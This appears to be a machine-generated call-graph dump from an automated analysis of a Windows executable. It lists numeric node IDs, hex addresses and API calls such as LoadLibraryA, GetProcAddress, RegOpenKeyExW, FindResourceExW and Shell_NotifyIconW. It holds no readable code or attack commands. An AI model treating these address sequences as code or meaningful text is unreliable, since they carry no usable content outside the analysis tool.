152fdc 97086->97087 97170 153084 22 API calls 97086->97170 97087->97071 97088 152fe8 97087->97088 97088->97082 97172 1563eb 22 API calls 97088->97172 97091 152fbf 97093 15a8c7 22 API calls 97091->97093 97092 152ff8 97173 156a50 22 API calls 97092->97173 97095 152fcd 97093->97095 97171 153084 22 API calls 97095->97171 97097 153006 97174 1570b0 23 API calls 97097->97174 97099 153021 97102 153065 97099->97102 97175 156f88 22 API calls 97099->97175 97176 1570b0 23 API calls 97099->97176 97177 153084 22 API calls 97099->97177 97215 16fe0b 97104->97215 97106 15a976 97225 16fddb 97106->97225 97108 152e4d 97109 154ae3 97108->97109 97110 154af0 __wsopen_s 97109->97110 97112 154b22 97110->97112 97253 156b57 97110->97253 97121 154b58 97112->97121 97250 154c6d 97112->97250 97114 154c6d 22 API calls 97114->97121 97115 159cb3 22 API calls 97117 154c52 97115->97117 97116 159cb3 22 API calls 97116->97121 97118 15515f 22 API calls 97117->97118 97120 154c5e 97118->97120 97120->97029 97121->97114 97121->97116 97122 154c29 97121->97122 97265 15515f 97121->97265 97122->97115 97122->97120 97282 191f50 97123->97282 97126 159cb3 22 API calls 97127 153a8d 97126->97127 97284 153aa2 97127->97284 97129 153a97 97129->97031 97131 159cc2 _wcslen 97130->97131 97132 16fe0b 22 API calls 97131->97132 97133 159cea __fread_nolock 97132->97133 97134 16fddb 22 API calls 97133->97134 97135 152e8c 97134->97135 97136 154ecb 97135->97136 97304 154e90 LoadLibraryA 97136->97304 97141 154ef6 LoadLibraryExW 97312 154e59 LoadLibraryA 97141->97312 97142 193ccf 97143 154f39 68 API calls 97142->97143 97145 193cd6 97143->97145 97147 154e59 3 API calls 97145->97147 97149 193cde 97147->97149 97334 1550f5 97149->97334 97150 154f20 97150->97149 97151 154f2c 97150->97151 97153 154f39 68 API calls 97151->97153 97155 152ea5 97153->97155 97155->97036 97155->97037 97157 193d05 97159 15a8ea __fread_nolock 97158->97159 97160 15a8db 97158->97160 97159->97043 97160->97159 97161 16fe0b 22 API calls 97160->97161 97161->97159 97162->97046 97163->97052 97164->97061 97165->97070 97166->97073 97167->97077 97168->97083 97169->97086 97170->97091 97171->97087 97172->97092 97173->97097 97174->97099 97175->97099 97176->97099 97177->97099 97179 1c2d15 97178->97179 97180 15511f 64 API calls 97179->97180 97181 1c2d29 97180->97181 97484 1c2e66 97181->97484 97184 1c2d3f 97184->97039 97185 1550f5 40 API calls 97186 1c2d56 97185->97186 97187 1550f5 40 API calls 97186->97187 97188 1c2d66 97187->97188 97189 1550f5 40 API calls 97188->97189 97190 1c2d81 97189->97190 97191 1550f5 40 API calls 97190->97191 97192 1c2d9c 97191->97192 97193 15511f 64 API calls 97192->97193 97194 1c2db3 97193->97194 97195 17ea0c ___std_exception_copy 21 API calls 97194->97195 97196 1c2dba 97195->97196 97197 17ea0c ___std_exception_copy 21 API calls 97196->97197 97198 1c2dc4 97197->97198 97199 1550f5 40 API calls 97198->97199 97200 1c2dd8 97199->97200 97201 1c28fe 27 API calls 97200->97201 97202 1c2dee 97201->97202 97202->97184 97490 1c22ce 97202->97490 97205 154f43 97204->97205 97206 154f4a 97204->97206 97207 17e678 67 API calls 97205->97207 97208 154f59 97206->97208 97209 154f6a FreeLibrary 97206->97209 97207->97206 97208->97041 97209->97208 97210->97053 97211->97058 97212->97063 97213->97071 97214->97082 97217 16fddb 97215->97217 97218 16fdfa 97217->97218 97221 16fdfc 97217->97221 97235 17ea0c 97217->97235 97242 174ead 7 API calls 2 library calls 97217->97242 97218->97106 97220 17066d 97244 1732a4 RaiseException 97220->97244 97221->97220 97243 1732a4 RaiseException 97221->97243 97224 17068a 97224->97106 97227 16fde0 97225->97227 97226 17ea0c ___std_exception_copy 21 API calls 97226->97227 97227->97226 97228 16fdfa 97227->97228 97231 16fdfc 97227->97231 97247 174ead 7 API calls 2 library calls 97227->97247 97228->97108 97230 17066d 97249 1732a4 RaiseException 97230->97249 97231->97230 97248 1732a4 RaiseException 97231->97248 97234 17068a 97234->97108 97240 183820 __dosmaperr 97235->97240 97236 18385e 97246 17f2d9 20 API calls __dosmaperr 97236->97246 97238 183849 RtlAllocateHeap 97239 18385c 97238->97239 97238->97240 97239->97217 97240->97236 97240->97238 97245 174ead 7 API calls 2 library calls 97240->97245 97242->97217 97243->97220 97244->97224 97245->97240 97246->97239 97247->97227 97248->97230 97249->97234 97271 15aec9 97250->97271 97252 154c78 97252->97112 97254 156b67 _wcslen 97253->97254 97255 194ba1 97253->97255 97258 156ba2 97254->97258 97259 156b7d 97254->97259 97278 1593b2 97255->97278 97257 194baa 97257->97257 97261 16fddb 22 API calls 97258->97261 97277 156f34 22 API calls 97259->97277 97263 156bae 97261->97263 97262 156b85 __fread_nolock 97262->97112 97264 16fe0b 22 API calls 97263->97264 97264->97262 97266 15516e 97265->97266 97270 15518f __fread_nolock 97265->97270 97268 16fe0b 22 API calls 97266->97268 97267 16fddb 22 API calls 97269 1551a2 97267->97269 97268->97270 97269->97121 97270->97267 97272 15aedc 97271->97272 97273 15aed9 __fread_nolock 97271->97273 97274 16fddb 22 API calls 97272->97274 97273->97252 97275 15aee7 97274->97275 97276 16fe0b 22 API calls 97275->97276 97276->97273 97277->97262 97279 1593c0 97278->97279 97280 1593c9 __fread_nolock 97278->97280 97279->97280 97281 15aec9 22 API calls 97279->97281 97280->97257 97281->97280 97283 153a67 GetModuleFileNameW 97282->97283 97283->97126 97285 191f50 __wsopen_s 97284->97285 97286 153aaf GetFullPathNameW 97285->97286 97287 153ace 97286->97287 97288 153ae9 97286->97288 97289 156b57 22 API calls 97287->97289 97298 15a6c3 97288->97298 97291 153ada 97289->97291 97294 1537a0 97291->97294 97295 1537ae 97294->97295 97296 1593b2 22 API calls 97295->97296 97297 1537c2 97296->97297 97297->97129 97299 15a6d0 97298->97299 97300 15a6dd 97298->97300 97299->97291 97301 16fddb 22 API calls 97300->97301 97302 15a6e7 97301->97302 97303 16fe0b 22 API calls 97302->97303 97303->97299 97305 154ec6 97304->97305 97306 154ea8 GetProcAddress 97304->97306 97309 17e5eb 97305->97309 97307 154eb8 97306->97307 97307->97305 97308 154ebf FreeLibrary 97307->97308 97308->97305 97342 17e52a 97309->97342 97311 154eea 97311->97141 97311->97142 97313 154e8d 97312->97313 97314 154e6e GetProcAddress 97312->97314 97317 154f80 97313->97317 97315 154e7e 97314->97315 97315->97313 97316 154e86 FreeLibrary 97315->97316 97316->97313 97318 16fe0b 22 API calls 97317->97318 97319 154f95 97318->97319 97410 155722 97319->97410 97321 154fa1 __fread_nolock 97322 1550a5 97321->97322 97323 193d1d 97321->97323 97328 154fdc 97321->97328 97413 1542a2 CreateStreamOnHGlobal 97322->97413 97424 1c304d 74 API calls 97323->97424 97326 193d22 97329 15511f 64 API calls 97326->97329 97327 1550f5 40 API calls 97327->97328 97328->97326 97328->97327 97333 15506e messages 97328->97333 97419 15511f 97328->97419 97330 193d45 97329->97330 97331 1550f5 40 API calls 97330->97331 97331->97333 97333->97150 97335 155107 97334->97335 97336 193d70 97334->97336 97446 17e8c4 97335->97446 97339 1c28fe 97467 1c274e 97339->97467 97341 1c2919 97341->97157 97345 17e536 ___DestructExceptionObject 97342->97345 97343 17e544 97367 17f2d9 20 API calls __dosmaperr 97343->97367 97345->97343 97347 17e574 97345->97347 97346 17e549 97368 1827ec 26 API calls pre_c_initialization 97346->97368 97349 17e586 97347->97349 97350 17e579 97347->97350 97359 188061 97349->97359 97369 17f2d9 20 API calls __dosmaperr 97350->97369 97353 17e58f 97354 17e595 97353->97354 97355 17e5a2 97353->97355 97370 17f2d9 20 API calls __dosmaperr 97354->97370 97371 17e5d4 LeaveCriticalSection __fread_nolock 97355->97371 97357 17e554 __fread_nolock 97357->97311 97360 18806d ___DestructExceptionObject 97359->97360 97372 182f5e EnterCriticalSection 97360->97372 97362 18807b 97373 1880fb 97362->97373 97366 1880ac __fread_nolock 97366->97353 97367->97346 97368->97357 97369->97357 97370->97357 97371->97357 97372->97362 97374 18811e 97373->97374 97375 188177 97374->97375 97382 188088 97374->97382 97389 17918d EnterCriticalSection 97374->97389 97390 1791a1 LeaveCriticalSection 97374->97390 97391 184c7d 97375->97391 97380 188189 97380->97382 97404 183405 11 API calls 2 library calls 97380->97404 97386 1880b7 97382->97386 97383 1881a8 97405 17918d EnterCriticalSection 97383->97405 97409 182fa6 LeaveCriticalSection 97386->97409 97388 1880be 97388->97366 97389->97374 97390->97374 97396 184c8a __dosmaperr 97391->97396 97392 184cca 97407 17f2d9 20 API calls __dosmaperr 97392->97407 97393 184cb5 RtlAllocateHeap 97394 184cc8 97393->97394 97393->97396 97398 1829c8 97394->97398 97396->97392 97396->97393 97406 174ead 7 API calls 2 library calls 97396->97406 97399 1829fc __dosmaperr 97398->97399 97400 1829d3 RtlFreeHeap 97398->97400 97399->97380 97400->97399 97401 1829e8 97400->97401 97408 17f2d9 20 API calls __dosmaperr 97401->97408 97403 1829ee GetLastError 97403->97399 97404->97383 97405->97382 97406->97396 97407->97394 97408->97403 97409->97388 97411 16fddb 22 API calls 97410->97411 97412 155734 97411->97412 97412->97321 97414 1542bc FindResourceExW 97413->97414 97415 1542d9 97413->97415 97414->97415 97416 1935ba LoadResource 97414->97416 97415->97328 97416->97415 97417 1935cf SizeofResource 97416->97417 97417->97415 97418 1935e3 LockResource 97417->97418 97418->97415 97420 15512e 97419->97420 97423 193d90 97419->97423 97425 17ece3 97420->97425 97424->97326 97428 17eaaa 97425->97428 97427 15513c 97427->97328 97431 17eab6 ___DestructExceptionObject 97428->97431 97429 17eac2 97441 17f2d9 20 API calls __dosmaperr 97429->97441 97431->97429 97432 17eae8 97431->97432 97443 17918d EnterCriticalSection 97432->97443 97433 17eac7 97442 1827ec 26 API calls pre_c_initialization 97433->97442 97436 17eaf4 97444 17ec0a 62 API calls 2 library calls 97436->97444 97438 17eb08 97445 17eb27 LeaveCriticalSection __fread_nolock 97438->97445 97440 17ead2 __fread_nolock 97440->97427 97441->97433 97442->97440 97443->97436 97444->97438 97445->97440 97449 17e8e1 97446->97449 97448 155118 97448->97339 97450 17e8ed ___DestructExceptionObject 97449->97450 97451 17e900 ___scrt_fastfail 97450->97451 97452 17e92d 97450->97452 97453 17e925 __fread_nolock 97450->97453 97462 17f2d9 20 API calls __dosmaperr 97451->97462 97464 17918d EnterCriticalSection 97452->97464 97453->97448 97456 17e937 97465 17e6f8 38 API calls 4 library calls 97456->97465 97457 17e91a 97463 1827ec 26 API calls pre_c_initialization 97457->97463 97460 17e94e 97466 17e96c LeaveCriticalSection __fread_nolock 97460->97466 97462->97457 97463->97453 97464->97456 97465->97460 97466->97453 97470 17e4e8 97467->97470 97469 1c275d 97469->97341 97473 17e469 97470->97473 97472 17e505 97472->97469 97474 17e48c 97473->97474 97475 17e478 97473->97475 97479 17e488 __alldvrm 97474->97479 97483 18333f 11 API calls 2 library calls 97474->97483 97481 17f2d9 20 API calls __dosmaperr 97475->97481 97478 17e47d 97482 1827ec 26 API calls pre_c_initialization 97478->97482 97479->97472 97481->97478 97482->97479 97483->97479 97488 1c2e7a 97484->97488 97485 1550f5 40 API calls 97485->97488 97486 1c28fe 27 API calls 97486->97488 97487 1c2d3b 97487->97184 97487->97185 97488->97485 97488->97486 97488->97487 97489 15511f 64 API calls 97488->97489 97489->97488 97491 1c22e7 97490->97491 97492 1c22d9 97490->97492 97494 1c232c 97491->97494 97495 17e5eb 29 API calls 97491->97495 97504 1c22f0 97491->97504 97493 17e5eb 29 API calls 97492->97493 97493->97491 97519 1c2557 40 API calls __fread_nolock 97494->97519 97497 1c2311 97495->97497 97497->97494 97499 1c231a 97497->97499 97498 1c2370 97500 1c2374 97498->97500 97501 1c2395 97498->97501 97499->97504 97527 17e678 97499->97527 97506 17e678 67 API calls 97500->97506 97509 1c2381 97500->97509 97520 1c2171 97501->97520 97504->97184 97505 1c239d 97507 1c23c3 97505->97507 97508 1c23a3 97505->97508 97506->97509 97540 1c23f3 74 API calls 97507->97540 97511 1c23b0 97508->97511 97513 17e678 67 API calls 97508->97513 97509->97504 97510 17e678 67 API calls 97509->97510 97510->97504 97511->97504 97514 17e678 67 API calls 97511->97514 97513->97511 97514->97504 97515 1c23de 97515->97504 97518 17e678 67 API calls 97515->97518 97516 1c23ca 97516->97515 97517 17e678 67 API calls 97516->97517 97517->97515 97518->97504 97519->97498 97521 17ea0c ___std_exception_copy 21 API calls 97520->97521 97522 1c217f 97521->97522 97523 17ea0c ___std_exception_copy 21 API calls 97522->97523 97524 1c2190 97523->97524 97525 17ea0c ___std_exception_copy 21 API calls 97524->97525 97526 1c219c 97525->97526 97526->97505 97528 17e684 ___DestructExceptionObject 97527->97528 97529 17e695 97528->97529 97530 17e6aa 97528->97530 97558 17f2d9 20 API calls __dosmaperr 97529->97558 97539 17e6a5 __fread_nolock 97530->97539 97541 17918d EnterCriticalSection 97530->97541 97533 17e69a 97559 1827ec 26 API calls pre_c_initialization 97533->97559 97534 17e6c6 97542 17e602 97534->97542 97537 17e6d1 97560 17e6ee LeaveCriticalSection __fread_nolock 97537->97560 97539->97504 97540->97516 97541->97534 97543 17e624 97542->97543 97544 17e60f 97542->97544 97549 17e61f 97543->97549 97561 17dc0b 97543->97561 97593 17f2d9 20 API calls __dosmaperr 97544->97593 97546 17e614 97594 1827ec 26 API calls pre_c_initialization 97546->97594 97549->97537 97554 17e646 97578 18862f 97554->97578 97557 1829c8 _free 20 API calls 97557->97549 97558->97533 97559->97539 97560->97539 97562 17dc23 97561->97562 97563 17dc1f 97561->97563 97562->97563 97564 17d955 __fread_nolock 26 API calls 97562->97564 97567 184d7a 97563->97567 97565 17dc43 97564->97565 97595 1859be 62 API calls 5 library calls 97565->97595 97568 184d90 97567->97568 97569 17e640 97567->97569 97568->97569 97570 1829c8 _free 20 API calls 97568->97570 97571 17d955 97569->97571 97570->97569 97572 17d976 97571->97572 97573 17d961 97571->97573 97572->97554 97596 17f2d9 20 API calls __dosmaperr 97573->97596 97575 17d966 97597 1827ec 26 API calls pre_c_initialization 97575->97597 97577 17d971 97577->97554 97579 18863e 97578->97579 97580 188653 97578->97580 97601 17f2c6 20 API calls __dosmaperr 97579->97601 97581 18868e 97580->97581 97585 18867a 97580->97585 97603 17f2c6 20 API calls __dosmaperr 97581->97603 97584 188643 97602 17f2d9 20 API calls __dosmaperr 97584->97602 97598 188607 97585->97598 97586 188693 97604 17f2d9 20 API calls __dosmaperr 97586->97604 97590 17e64c 97590->97549 97590->97557 97591 18869b 97605 1827ec 26 API calls pre_c_initialization 97591->97605 97593->97546 97594->97549 97595->97563 97596->97575 97597->97577 97606 188585 97598->97606 97600 18862b 97600->97590 97601->97584 97602->97590 97603->97586 97604->97591 97605->97590 97607 188591 ___DestructExceptionObject 97606->97607 97617 185147 EnterCriticalSection 97607->97617 97609 18859f 97610 1885d1 97609->97610 97611 1885c6 97609->97611 97633 17f2d9 20 API calls __dosmaperr 97610->97633 97618 1886ae 97611->97618 97614 1885cc 97634 1885fb LeaveCriticalSection __wsopen_s 97614->97634 97616 1885ee __fread_nolock 97616->97600 97617->97609 97635 1853c4 97618->97635 97620 1886be 97621 1886c4 97620->97621 97623 1886f6 97620->97623 97626 1853c4 __wsopen_s 26 API calls 97620->97626 97648 185333 21 API calls 2 library calls 97621->97648 97623->97621 97624 1853c4 __wsopen_s 26 API calls 97623->97624 97627 188702 CloseHandle 97624->97627 97625 18871c 97628 18873e 97625->97628 97649 17f2a3 20 API calls __dosmaperr 97625->97649 97629 1886ed 97626->97629 97627->97621 97631 18870e GetLastError 97627->97631 97628->97614 97630 1853c4 __wsopen_s 26 API calls 97629->97630 97630->97623 97631->97621 97633->97614 97634->97616 97636 1853d1 97635->97636 97637 1853e6 97635->97637 97650 17f2c6 20 API calls __dosmaperr 97636->97650 97641 18540b 97637->97641 97652 17f2c6 20 API calls __dosmaperr 97637->97652 97640 1853d6 97651 17f2d9 20 API calls __dosmaperr 97640->97651 97641->97620 97642 185416 97653 17f2d9 20 API calls __dosmaperr 97642->97653 97644 1853de 97644->97620 97646 18541e 97654 1827ec 26 API calls pre_c_initialization 97646->97654 97648->97625 97649->97628 97650->97640 97651->97644 97652->97642 97653->97646 97654->97644 97655 153156 97658 153170 97655->97658 97659 153187 97658->97659 97660 1531e9 97659->97660 97661 15318c 97659->97661 97662 1531eb 97659->97662 97663 1531d0 DefWindowProcW 97660->97663 97666 153265 PostQuitMessage 97661->97666 97667 153199 97661->97667 97664 192dfb 97662->97664 97665 1531f1 97662->97665 97668 15316a 97663->97668 97707 1518e2 10 API calls 97664->97707 97669 15321d SetTimer RegisterWindowMessageW 97665->97669 97670 1531f8 97665->97670 97666->97668 97672 1531a4 97667->97672 97673 192e7c 97667->97673 97669->97668 97678 153246 CreatePopupMenu 97669->97678 97675 153201 KillTimer 97670->97675 97676 192d9c 97670->97676 97679 192e68 97672->97679 97680 1531ae 97672->97680 97722 1bbf30 34 API calls ___scrt_fastfail 97673->97722 97703 1530f2 Shell_NotifyIconW ___scrt_fastfail 97675->97703 97684 192da1 97676->97684 97685 192dd7 MoveWindow 97676->97685 97677 192e1c 97708 16e499 42 API calls 97677->97708 97678->97668 97721 1bc161 27 API calls ___scrt_fastfail 97679->97721 97681 192e4d 97680->97681 97682 1531b9 97680->97682 97681->97663 97720 1b0ad7 22 API calls 97681->97720 97689 1531c4 97682->97689 97690 153253 97682->97690 97683 192e8e 97683->97663 97683->97668 97691 192da7 97684->97691 97692 192dc6 SetFocus 97684->97692 97685->97668 97689->97663 97709 1530f2 Shell_NotifyIconW ___scrt_fastfail 97689->97709 97705 15326f 44 API calls ___scrt_fastfail 97690->97705 97691->97689 97696 192db0 97691->97696 97692->97668 97693 153214 97704 153c50 DeleteObject DestroyWindow 97693->97704 97694 153263 97694->97668 97706 1518e2 10 API calls 97696->97706 97701 192e41 97710 153837 97701->97710 97703->97693 97704->97668 97705->97694 97706->97668 97707->97677 97708->97689 97709->97701 97711 153862 ___scrt_fastfail 97710->97711 97723 154212 97711->97723 97714 1538e8 97716 153906 Shell_NotifyIconW 97714->97716 97717 193386 Shell_NotifyIconW 97714->97717 97727 153923 97716->97727 97719 15391c 97719->97660 97720->97660 97721->97694 97722->97683 97724 1538b7 97723->97724 97725 1935a4 97723->97725 97724->97714 97749 1bc874 42 API calls _strftime 97724->97749 97725->97724 97726 1935ad DestroyIcon 97725->97726 97726->97724 97728 15393f 97727->97728 97747 153a13 97727->97747 97750 156270 97728->97750 97731 193393 LoadStringW 97734 1933ad 97731->97734 97732 15395a 97733 156b57 22 API calls 97732->97733 97735 15396f 97733->97735 97738 15a8c7 22 API calls 97734->97738 97743 153994 ___scrt_fastfail 97734->97743 97736 1933c9 97735->97736 97737 15397c 97735->97737 97740 156350 22 API calls 97736->97740 97737->97734 97739 153986 97737->97739 97738->97743 97755 156350 97739->97755 97742 1933d7 97740->97742 97742->97743 97764 1533c6 97742->97764 97745 1539f9 Shell_NotifyIconW 97743->97745 97745->97747 97746 1933f9 97748 1533c6 22 API calls 97746->97748 97747->97719 97748->97743 97749->97714 97751 16fe0b 22 API calls 97750->97751 97752 156295 97751->97752 97753 16fddb 22 API calls 97752->97753 97754 15394d 97753->97754 97754->97731 97754->97732 97756 156362 97755->97756 97757 194a51 97755->97757 97773 156373 97756->97773 97783 154a88 22 API calls __fread_nolock 97757->97783 97760 15636e 97760->97743 97761 194a5b 97762 194a67 97761->97762 97763 15a8c7 22 API calls 97761->97763 97763->97762 97765 1930bb 97764->97765 97766 1533dd 97764->97766 97768 16fddb 22 API calls 97765->97768 97789 1533ee 97766->97789 97770 1930c5 _wcslen 97768->97770 97769 1533e8 97769->97746 97771 16fe0b 22 API calls 97770->97771 97772 1930fe __fread_nolock 97771->97772 97774 156382 97773->97774 97780 1563b6 __fread_nolock 97773->97780 97775 194a82 97774->97775 97776 1563a9 97774->97776 97774->97780 97778 16fddb 22 API calls 97775->97778 97784 15a587 97776->97784 97779 194a91 97778->97779 97781 16fe0b 22 API calls 97779->97781 97780->97760 97782 194ac5 __fread_nolock 97781->97782 97783->97761 97785 15a59d 97784->97785 97788 15a598 __fread_nolock 97784->97788 97786 19f80f 97785->97786 97787 16fe0b 22 API calls 97785->97787 97787->97788 97788->97780 97790 1533fe _wcslen 97789->97790 97791 19311d 97790->97791 97792 153411 97790->97792 97793 16fddb 22 API calls 97791->97793 97794 15a587 22 API calls 97792->97794 97795 193127 97793->97795 97796 15341e __fread_nolock 97794->97796 97797 16fe0b 22 API calls 97795->97797 97796->97769 97798 193157 __fread_nolock 97797->97798 97799 151033 97804 154c91 97799->97804 97803 151042 97805 15a961 22 API calls 97804->97805 97806 154cff 97805->97806 97812 153af0 97806->97812 97809 154d9c 97810 151038 97809->97810 97815 1551f7 22 API calls __fread_nolock 97809->97815 97811 1700a3 29 API calls __onexit 97810->97811 97811->97803 97816 153b1c 97812->97816 97815->97809 97817 153b0f 97816->97817 97818 153b29 97816->97818 97817->97809 97818->97817 97819 153b30 RegOpenKeyExW 97818->97819 97819->97817 97820 153b4a RegQueryValueExW 97819->97820 97821 153b80 RegCloseKey 97820->97821 97822 153b6b 97820->97822 97821->97817 97822->97821 97823 15f7bf 97824 15fcb6 97823->97824 97825 15f7d3 97823->97825 97913 15aceb 23 API calls messages 97824->97913 97827 15fcc2 97825->97827 97828 16fddb 22 API calls 97825->97828 97914 15aceb 23 API calls messages 97827->97914 97830 15f7e5 97828->97830 97830->97827 97831 15f83e 97830->97831 97832 15fd3d 97830->97832 97857 15ed9d messages 97831->97857 97858 161310 97831->97858 97915 1c1155 22 API calls 97832->97915 97835 15fef7 97843 15a8c7 22 API calls 97835->97843 97835->97857 97838 1a4b0b 97917 1c359c 82 API calls __wsopen_s 97838->97917 97839 15a8c7 22 API calls 97854 15ec76 messages 97839->97854 97840 1a4600 97844 15a8c7 22 API calls 97840->97844 97840->97857 97843->97857 97844->97857 97846 15fbe3 97848 1a4bdc 97846->97848 97855 15f3ae messages 97846->97855 97846->97857 97847 15a961 22 API calls 97847->97854 97918 1c359c 82 API calls __wsopen_s 97848->97918 97850 1700a3 29 API calls pre_c_initialization 97850->97854 97851 170242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97851->97854 97852 1a4beb 97919 1c359c 82 API calls __wsopen_s 97852->97919 97853 16fddb 22 API calls 97853->97854 97854->97835 97854->97838 97854->97839 97854->97840 97854->97846 97854->97847 97854->97850 97854->97851 97854->97852 97854->97853 97854->97855 97856 1701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97854->97856 97854->97857 97911 1601e0 207 API calls 2 library calls 97854->97911 97912 1606a0 41 API calls messages 97854->97912 97855->97857 97916 1c359c 82 API calls __wsopen_s 97855->97916 97856->97854 97859 161376 97858->97859 97860 1617b0 97858->97860 97861 1a6331 97859->97861 97865 161940 9 API calls 97859->97865 98057 170242 5 API calls __Init_thread_wait 97860->98057 98062 1d709c 207 API calls 97861->98062 97863 1617ba 97868 159cb3 22 API calls 97863->97868 97870 1617fb 97863->97870 97867 1613a0 97865->97867 97866 1a633d 97866->97854 97869 161940 9 API calls 97867->97869 97874 1617d4 97868->97874 97871 1613b6 97869->97871 97872 1a6346 97870->97872 97875 16182c 97870->97875 97871->97870 97873 1613ec 97871->97873 98063 1c359c 82 API calls __wsopen_s 97872->98063 97873->97872 97897 161408 __fread_nolock 97873->97897 98058 1701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97874->98058 98059 15aceb 23 API calls messages 97875->98059 97878 161839 98060 16d217 207 API calls 97878->98060 97881 1a636e 98064 1c359c 82 API calls __wsopen_s 97881->98064 97882 16152f 97884 16153c 97882->97884 97885 1a63d1 97882->97885 97887 161940 9 API calls 97884->97887 98066 1d5745 54 API calls _wcslen 97885->98066 97889 161549 97887->97889 97888 16fddb 22 API calls 97888->97897 97894 161940 9 API calls 97889->97894 97902 1615c7 messages 97889->97902 97890 161872 97890->97861 98061 16faeb 23 API calls 97890->98061 97891 16fe0b 22 API calls 97891->97897 97892 16171d 97892->97854 97898 161563 97894->97898 97897->97878 97897->97881 97897->97882 97897->97888 97897->97891 97899 1a63b2 97897->97899 97897->97902 98032 15ec40 97897->98032 97898->97902 97905 15a8c7 22 API calls 97898->97905 98065 1c359c 82 API calls __wsopen_s 97899->98065 97902->97890 97904 16167b messages 97902->97904 97920 161940 97902->97920 97930 1de204 97902->97930 97966 1c744a 97902->97966 98022 156246 97902->98022 98026 1c83da 97902->98026 98029 1d958b 97902->98029 98067 1c359c 82 API calls __wsopen_s 97902->98067 97904->97892 98056 16ce17 22 API calls messages 97904->98056 97905->97902 97911->97854 97912->97854 97913->97827 97914->97832 97915->97857 97916->97857 97917->97857 97918->97852 97919->97857 97921 161981 97920->97921 97922 16195d 97920->97922 98068 170242 5 API calls __Init_thread_wait 97921->98068 97929 16196e 97922->97929 98070 170242 5 API calls __Init_thread_wait 97922->98070 97924 16198b 97924->97922 98069 1701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97924->98069 97926 168727 97926->97929 98071 1701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97926->98071 97929->97902 97931 15a961 22 API calls 97930->97931 97932 1de21b 97931->97932 98072 157510 97932->98072 97935 156270 22 API calls 97936 1de23d 97935->97936 97937 157510 53 API calls 97936->97937 97938 1de24a 97937->97938 97939 1de2c7 97938->97939 97940 1de262 97938->97940 97941 157510 53 API calls 97939->97941 98114 15b567 39 API calls 97940->98114 97943 1de2cc 97941->97943 97945 1de2d9 97943->97945 97946 1de314 97943->97946 97944 1de267 97944->97945 97949 1de280 97944->97949 98117 159c6e 22 API calls 97945->98117 97947 1de32c 97946->97947 98118 15b567 39 API calls 97946->98118 97958 1de345 97947->97958 98119 15b567 39 API calls 97947->98119 98115 156d25 22 API calls __fread_nolock 97949->98115 97953 15a8c7 22 API calls 97955 1de35f 97953->97955 97954 1de28d 97956 156350 22 API calls 97954->97956 98095 1b92c8 97955->98095 97957 1de29b 97956->97957 98116 156d25 22 API calls __fread_nolock 97957->98116 97958->97953 97961 1de2b4 97962 156350 22 API calls 97961->97962 97965 1de2c2 97962->97965 97963 1de2e6 97963->97902 98120 1562b5 22 API calls 97965->98120 97967 1c7469 97966->97967 97968 1c7474 97966->97968 98145 15b567 39 API calls 97967->98145 97971 15a961 22 API calls 97968->97971 98009 1c7554 97968->98009 97970 16fddb 22 API calls 97972 1c7587 97970->97972 97973 1c7495 97971->97973 97974 16fe0b 22 API calls 97972->97974 97975 15a961 22 API calls 97973->97975 97976 1c7598 97974->97976 97977 1c749e 97975->97977 97978 156246 CloseHandle 97976->97978 97980 157510 53 API calls 97977->97980 97979 1c75a3 97978->97979 97981 15a961 22 API calls 97979->97981 97982 1c74aa 97980->97982 97983 1c75ab 97981->97983 98146 15525f 22 API calls 97982->98146 97985 156246 CloseHandle 97983->97985 97987 1c75b2 97985->97987 97986 1c74bf 97988 156350 22 API calls 97986->97988 97990 157510 53 API calls 97987->97990 97989 1c74f2 97988->97989 97991 1c754a 97989->97991 98147 1bd4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 97989->98147 97992 1c75be 97990->97992 98149 15b567 39 API calls 97991->98149 97994 156246 CloseHandle 97992->97994 97997 1c75c8 97994->97997 97996 1c7502 97996->97991 97998 1c7506 97996->97998 98137 155745 97997->98137 97999 159cb3 22 API calls 97998->97999 98001 1c7513 97999->98001 98148 1bd2c1 26 API calls 98001->98148 98004 1c76de GetLastError 98006 1c76f7 98004->98006 98005 1c75ea 98150 1553de 27 API calls messages 98005->98150 98157 156216 CloseHandle messages 98006->98157 98009->97970 98020 1c76a4 98009->98020 98010 1c75f8 98151 1553c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98010->98151 98011 1c751c 98011->97991 98013 1c7645 98014 16fddb 22 API calls 98013->98014 98016 1c7679 98014->98016 98015 1c75ff 98015->98013 98152 1bccff 98015->98152 98017 15a961 22 API calls 98016->98017 98019 1c7686 98017->98019 98019->98020 98156 1b417d 22 API calls __fread_nolock 98019->98156 98020->97902 98023 156250 98022->98023 98024 15625f 98022->98024 98023->97902 98024->98023 98025 156264 CloseHandle 98024->98025 98025->98023 98160 1c98e3 98026->98160 98028 1c83ea 98028->97902 98223 1d7f59 98029->98223 98031 1d959b 98031->97902 98054 15ec76 messages 98032->98054 98033 16fddb 22 API calls 98033->98054 98034 170242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98034->98054 98035 1701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98035->98054 98036 15fef7 98044 15a8c7 22 API calls 98036->98044 98049 15ed9d messages 98036->98049 98039 1a4b0b 98310 1c359c 82 API calls __wsopen_s 98039->98310 98040 15a8c7 22 API calls 98040->98054 98041 1a4600 98045 15a8c7 22 API calls 98041->98045 98041->98049 98044->98049 98045->98049 98047 15fbe3 98047->98049 98050 1a4bdc 98047->98050 98055 15f3ae messages 98047->98055 98048 15a961 22 API calls 98048->98054 98049->97897 98311 1c359c 82 API calls __wsopen_s 98050->98311 98051 1700a3 29 API calls pre_c_initialization 98051->98054 98053 1a4beb 98312 1c359c 82 API calls __wsopen_s 98053->98312 98054->98033 98054->98034 98054->98035 98054->98036 98054->98039 98054->98040 98054->98041 98054->98047 98054->98048 98054->98049 98054->98051 98054->98053 98054->98055 98307 1601e0 207 API calls 2 library calls 98054->98307 98308 1606a0 41 API calls messages 98054->98308 98055->98049 98309 1c359c 82 API calls __wsopen_s 98055->98309 98056->97904 98057->97863 98058->97870 98059->97878 98060->97890 98061->97890 98062->97866 98063->97902 98064->97902 98065->97902 98066->97898 